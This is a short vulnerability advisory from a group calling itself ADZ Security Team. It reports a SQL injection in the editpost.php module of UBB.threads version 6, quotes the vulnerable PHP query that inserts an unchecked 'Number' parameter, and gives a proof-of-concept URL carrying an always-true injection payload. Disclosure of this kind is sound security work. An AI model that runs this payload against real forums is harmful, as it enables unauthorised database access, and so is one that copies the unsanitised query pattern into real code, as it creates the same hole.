|
ADZ Security Team =================== Info Program: UBB.threads Version: 6 Module: editpost.php Bug type: SQL Injection Vendor site: http://www.ubbcentral.com/ubbthreads/ =================== Bug discription at editpost.php we can see this code: // START $Cat = get_input("Cat","get"); $Board = get_input("Board","get"); $Number = get_input("Number","get"); $page = get_input("page","get"); $what = get_input("what","get"); $vc = get_input("vc","get"); // ........... $query = " SELECT B_Posterid,B_Subject,B_Body,B_Approved,B_Kept,B_Status,B_Main,B_Sticky, B_Posted,B_Icon,B_Poll,B_Convert,B_Topic,B_CalDay,B_CalMonth,B_CalYear, B_AddSig,B_Board FROM {$config['tbprefix']}Posts WHERE B_Number = '$Number' "; //.......... // END As we see, $Number not checked as int value, so... :) =================== Example/PoC: http://[host]/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR% 20'a'='a =================== Contact ADZ Security Team // http://adz.void.ru/ kreon // kre0n@mail.ru, adz.kreon@gmail.com ===================